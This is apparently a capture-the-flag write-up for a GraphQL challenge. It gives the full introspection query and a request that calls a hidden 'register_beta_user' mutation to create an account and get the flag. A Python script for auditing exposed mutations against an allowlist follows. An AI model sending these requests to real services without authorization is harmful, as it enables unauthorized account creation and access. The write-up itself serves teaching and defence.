When logging in, the webapp makes a POST request to the `/graphql` endpoint using a mutation query.

```http
POST /graphql HTTP/2
Host: flagcoin.ctf.glacierctf.com
Content-Type: application/json

{"query":"\n mutation($username: String!, $password: String!) { \n login(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}}
```

Using a GraphQL introspection query, we can pull all of the fields available to query.

```JSON
{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
```

Response (excerpt):

```JSON
{"name":"register_beta_user","description":null,"args":[{"name":"username","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null},{"name":"password","description":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":null}
```

The response contains a `register_beta_user` function that takes the same `username` and `password` arguments as `login`. Replacing the `login` function with the `register_beta_user` function in the original request gives us a valid user, and we then log in as that user to get the flag.

```http
POST /graphql HTTP/2
Host: flagcoin.ctf.glacierctf.com
Content-Type: application/json

{"query":"\n mutation($username: String!, $password: String!) { \n register_beta_user(username: $username, password: $password) { \n username \n } \n }\n ","variables":{"username":"teststyle","password":"teststyle"}}
```
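
The defender's side of the introspection step, as an added example that is not part of the original writeup: it audits an introspection result from your own schema for mutations outside the intended public set. The sample data, the `User` type, the `login` argument types and the allowlist are constructed assumptions; only the `register_beta_user` arguments follow the response excerpt.

```python
# Constructed introspection result, shaped like the response excerpt and
# trimmed to the keys this audit reads. "User" and the login types are assumed.
STR = {"kind": "SCALAR", "name": "String", "ofType": None}
REQ = {"kind": "NON_NULL", "name": None, "ofType": STR}
USER = {"kind": "OBJECT", "name": "User", "ofType": None}
SAMPLE = {"data": {"__schema": {
    "mutationType": {"name": "Mutation"},
    "types": [
        {"kind": "OBJECT", "name": "User", "fields": []},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "login", "type": USER, "args": [
                {"name": "username", "type": REQ},
                {"name": "password", "type": REQ}]},
            {"name": "register_beta_user", "type": USER, "args": [
                {"name": "username", "type": STR},
                {"name": "password", "type": STR}]}]}]}}}

def render_type(ref):
    """Unwrap NON_NULL / LIST wrappers of a TypeRef into GraphQL notation."""
    if ref["kind"] == "NON_NULL":
        return render_type(ref["ofType"]) + "!"
    if ref["kind"] == "LIST":
        return "[" + render_type(ref["ofType"]) + "]"
    return ref["name"]

def mutation_signatures(result):
    """Map each mutation name to its rendered signature; {} if there are none."""
    schema = result["data"]["__schema"]
    root = schema.get("mutationType")
    if not root:  # schema defines no mutation root type
        return {}
    fields = next(t for t in schema["types"] if t["name"] == root["name"])["fields"]
    return {f["name"]: "{}({}): {}".format(
                f["name"],
                ", ".join(f'{a["name"]}: {render_type(a["type"])}' for a in f["args"]),
                render_type(f["type"]))
            for f in fields or []}

def unexpected_mutations(result, allowlist):
    """Signatures of exposed mutations that are not in the intended public set."""
    sigs = mutation_signatures(result)
    return sorted(sig for name, sig in sigs.items() if name not in allowlist)

if __name__ == "__main__":
    for sig in unexpected_mutations(SAMPLE, allowlist={"login"}):
        print("exposed but not in allowlist:", sig)
```

Run against a real introspection dump in CI, a non-empty result is a prompt to put the mutation behind authorization or remove it from the public schema. Disabling introspection alone does not make such a mutation uncallable.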